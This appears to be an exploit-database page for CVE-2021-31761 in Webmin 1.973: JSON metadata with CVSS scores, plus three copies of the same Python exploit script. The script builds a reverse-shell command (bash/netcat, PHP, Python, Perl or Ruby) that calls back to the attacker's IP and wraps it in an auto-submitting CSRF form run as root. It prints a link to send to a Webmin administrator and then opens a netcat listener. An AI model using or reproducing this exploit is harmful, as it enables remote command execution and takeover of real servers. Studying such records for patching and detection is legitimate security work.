Exploit for Cross-site Scripting in Webmin

2021-04-21T19:46:43

Description

# ..| CVE-2021-31761 |.. # Description : <b>Exploiting a Reflec...

{"id": "DEAFBFA5-F25C-5046-9615-A5F337FCF2E7", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Cross-site Scripting in Webmin", "description": "# ..| CVE-2021-31761 |..\n\n# Description :\n<b>Exploiting a Reflec...", "published": "2021-04-21T19:46:43", "modified": "2021-06-20T03:50:26", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-31761"], "immutableFields": [], "lastseen": "2021-12-10T15:21:33", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-31761"]}, {"type": "exploitdb", "idList": ["EDB-ID:50144"]}, {"type": "githubexploit", "idList": ["80853E7D-3590-5E87-AD43-378E0461B3EB"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163559"]}, {"type": "zdt", "idList": ["1337DAY-ID-36572"]}], "rev": 4}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "canvas", "idList": ["WEBMIN"]}, {"type": "cve", "idList": ["CVE-2021-31761"]}, {"type": "exploitdb", "idList": ["EDB-ID:50144"]}, {"type": "githubexploit", "idList": ["80853E7D-3590-5E87-AD43-378E0461B3EB"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163559"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}, {"type": "zdt", "idList": ["1337DAY-ID-36572"]}]}, "exploitation": null, "vulnersScore": 5.9}, "_state": {"dependencies": 1647589307, "score": 0}, "privateArea": 1}

{"packetstorm": [{"lastseen": "2021-07-20T17:19:32", "description": "", "cvss3": {}, "published": "2021-07-20T00:00:00", "type": "packetstorm", "title": "Webmin 1.973 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "PACKETSTORM:163559", "href": "https://packetstormsecurity.com/files/163559/Webmin-1.973-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) \n# Date: 24/04/2021 \n# Exploit Author: Mesh3l_911 & Z0ldyck \n# Vendor Homepage: https://www.webmin.com \n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 \n# Version: Webmin 1.973 \n# Tested on: All versions <= 1.973 \n# CVE: CVE-2021-31761 \n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to \n# get a Remote Command Execution (RCE) through the Webmin's running process \n# feature \n \nimport time, subprocess,random,urllib.parse \n \n \nprint('''\\033[1;37m \n \n__ __ _ ____ _ _________ _ _ _ \n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ \n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / \n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/ \n__/ | \n|___/ \n \n\\033[1;m''') \n \nfor i in range(101): \nprint( \n\"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;37m@Mesh3l_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;37m@electronicbots\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format( \ni), \"\\033[1;36m%\\033[1;m\", end=\"\") \ntime.sleep(0.02) \nprint(\"\\n\\n\") \n \ntarget = input( \n\"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\") \n \nif target.endswith('/'): \ntarget = target + 'tunnel/link.cgi/' \nelse: \ntarget = target + '/tunnel/link.cgi/' \n \nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\") \n \nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\") \n \nReverseShell = input \\ \n('''\\033[1;37m \n\\n \n1- Bash Reverse Shell \\n \n2- PHP Reverse Shell \\n \n3- Python Reverse Shell \\n \n4- Perl Reverse Shell \\n \n5- Ruby Reverse Shell \\n \n\\033[1;m \n \n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \\033[1;m''') \n \nfile_name = random.randrange(1000) \n \nif ReverseShell == '1': \nReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' \n \nelif ReverseShell == '2': \nReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' ''' \n \nelif ReverseShell == '3': \nReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' ''' \n \nelif ReverseShell == '4': \nReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' ''' \n \nelif ReverseShell == '5': \nReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' ''' \n \nelse: \nprint(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\") \n \n \ndef CSRF_Generator(): \nPayload = urllib.parse.quote(''' \n \n<html> \n<head> \n<meta name=\"referrer\" content=\"never\"> \n</head> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"/proc/run.cgi\" method=\"POST\"> \n<input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" /> \n<input type=\"hidden\" name=\"mode\" value=\"0\" /> \n<input type=\"hidden\" name=\"user\" value=\"root\" /> \n<input type=\"hidden\" name=\"input\" value=\"\" /> \n<input type=\"hidden\" name=\"undefined\" value=\"\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n<script> \ndocument.forms[0].submit(); \n</script> \n</body> \n \n</html> \n \n''') \n \nprint(\"\\033[1;36m\\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\") \n \nprint(target+Payload) \n \ndef Netcat_listener(): \nprint() \nsubprocess.run([\"nc\", \"-nlvp \"+port+\"\"]) \n \n \ndef main(): \nCSRF_Generator() \nNetcat_listener() \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163559/webmin1973-xsrfexec.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T18:08:01", "description": "Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-25T19:15:00", "type": "cve", "title": "CVE-2021-31761", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-12-08T20:26:00", "cpe": ["cpe:/a:webmin:webmin:1.973"], "id": "CVE-2021-31761", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31761", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webmin:webmin:1.973:*:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2021-12-15T15:38:34", "description": "# CVE-2021-31761\n\n# Description :\n<b>Exploiting a Reflected Cros...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T20:00:09", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Webmin", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-12-15T14:41:56", "id": "80853E7D-3590-5E87-AD43-378E0461B3EB", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-12-04T15:52:23", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-20T00:00:00", "type": "zdt", "title": "Webmin 1.973 - (run.cgi) Cross-Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "1337DAY-ID-36572", "href": "https://0day.today/exploit/description/36572", "sourceData": "# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)\n# Exploit Author: Mesh3l_911 & Z0ldyck\n# Vendor Homepage: https://www.webmin.com\n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761\n# Version: Webmin 1.973\n# Tested on: All versions <= 1.973\n# CVE: CVE-2021-31761\n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to\n# get a Remote Command Execution (RCE) through the Webmin's running process\n# feature\n\nimport time, subprocess,random,urllib.parse\n\n\nprint('''\\033[1;37m\n\n __ __ _ ____ _ _________ _ _ _ \n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __\n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /\n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/\n __/ | \n |___/ \n\n \\033[1;m''')\n\nfor i in range(101):\n print(\n \"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;[email\u00a0protected]_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;[email\u00a0protected]\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format(\n i), \"\\033[1;36m%\\033[1;m\", end=\"\")\n time.sleep(0.02)\nprint(\"\\n\\n\")\n\ntarget = input(\n \"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\")\n\nif target.endswith('/'):\n target = target + 'tunnel/link.cgi/'\nelse:\n target = target + '/tunnel/link.cgi/'\n\nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\")\n\nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\")\n\nReverseShell = input \\\n('''\\033[1;37m\n\\n\n1- Bash Reverse Shell \\n\n2- PHP Reverse Shell \\n\n3- Python Reverse Shell \\n\n4- Perl Reverse Shell \\n\n5- Ruby Reverse Shell \\n\n\\033[1;m\n\n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \\033[1;m''')\n\nfile_name = random.randrange(1000)\n\nif ReverseShell == '1':\n ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''\n\nelif ReverseShell == '2':\n ReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' '''\n\nelif ReverseShell == '3':\n ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' '''\n\nelif ReverseShell == '4':\n ReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' '''\n\nelif ReverseShell == '5':\n ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' '''\n\nelse:\n print(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\")\n\n\ndef CSRF_Generator():\n Payload = urllib.parse.quote('''\n\n<html>\n <head>\n <meta name=\"referrer\" content=\"never\">\n </head>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"/proc/run.cgi\" method=\"POST\">\n <input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" />\n <input type=\"hidden\" name=\"mode\" value=\"0\" />\n <input type=\"hidden\" name=\"user\" value=\"root\" />\n <input type=\"hidden\" name=\"input\" value=\"\" />\n <input type=\"hidden\" name=\"undefined\" value=\"\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n\n</html>\n\n ''')\n\n print(\"\\033[1;36m\\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\")\n\n print(target+Payload)\n\ndef Netcat_listener():\n print()\n subprocess.run([\"nc\", \"-nlvp \"+port+\"\"])\n\n\ndef main():\n CSRF_Generator()\n Netcat_listener()\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36572", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:36:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-07-20T00:00:00", "type": "exploitdb", "title": "Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-31761", "CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "EDB-ID:50144", "href": "https://www.exploit-db.com/exploits/50144", "sourceData": "# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)\r\n# Date: 24/04/2021\r\n# Exploit Author: Mesh3l_911 & Z0ldyck\r\n# Vendor Homepage: https://www.webmin.com\r\n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761\r\n# Version: Webmin 1.973\r\n# Tested on: All versions <= 1.973\r\n# CVE: CVE-2021-31761\r\n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to\r\n# get a Remote Command Execution (RCE) through the Webmin's running process\r\n# feature\r\n\r\nimport time, subprocess,random,urllib.parse\r\n\r\n\r\nprint('''\\033[1;37m\r\n\r\n __ __ _ ____ _ _________ _ _ _ \r\n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \r\n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __\r\n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /\r\n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \r\n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/\r\n __/ | \r\n |___/ \r\n\r\n \\033[1;m''')\r\n\r\nfor i in range(101):\r\n print(\r\n \"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;37m@Mesh3l_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;37m@electronicbots\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format(\r\n i), \"\\033[1;36m%\\033[1;m\", end=\"\")\r\n time.sleep(0.02)\r\nprint(\"\\n\\n\")\r\n\r\ntarget = input(\r\n \"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\")\r\n\r\nif target.endswith('/'):\r\n target = target + 'tunnel/link.cgi/'\r\nelse:\r\n target = target + '/tunnel/link.cgi/'\r\n\r\nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\")\r\n\r\nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\")\r\n\r\nReverseShell = input \\\r\n('''\\033[1;37m\r\n\\n\r\n1- Bash Reverse Shell \\n\r\n2- PHP Reverse Shell \\n\r\n3- Python Reverse Shell \\n\r\n4- Perl Reverse Shell \\n\r\n5- Ruby Reverse Shell \\n\r\n\\033[1;m\r\n\r\n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \\033[1;m''')\r\n\r\nfile_name = random.randrange(1000)\r\n\r\nif ReverseShell == '1':\r\n ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''\r\n\r\nelif ReverseShell == '2':\r\n ReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' '''\r\n\r\nelif ReverseShell == '3':\r\n ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' '''\r\n\r\nelif ReverseShell == '4':\r\n ReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' '''\r\n\r\nelif ReverseShell == '5':\r\n ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' '''\r\n\r\nelse:\r\n print(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\")\r\n\r\n\r\ndef CSRF_Generator():\r\n Payload = urllib.parse.quote('''\r\n\r\n<html>\r\n <head>\r\n <meta name=\"referrer\" content=\"never\">\r\n </head>\r\n <body>\r\n <script>history.pushState('', '', '/')</script>\r\n <form action=\"/proc/run.cgi\" method=\"POST\">\r\n <input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" />\r\n <input type=\"hidden\" name=\"mode\" value=\"0\" />\r\n <input type=\"hidden\" name=\"user\" value=\"root\" />\r\n <input type=\"hidden\" name=\"input\" value=\"\" />\r\n <input type=\"hidden\" name=\"undefined\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n <script>\r\n document.forms[0].submit();\r\n </script>\r\n </body>\r\n\r\n</html>\r\n\r\n ''')\r\n\r\n print(\"\\033[1;36m\\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\")\r\n\r\n print(target+Payload)\r\n\r\ndef Netcat_listener():\r\n print()\r\n subprocess.run([\"nc\", \"-nlvp \"+port+\"\"])\r\n\r\n\r\ndef main():\r\n CSRF_Generator()\r\n Netcat_listener()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50144", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}

Exploit for Cross-site Scripting in Webmin

Description

Related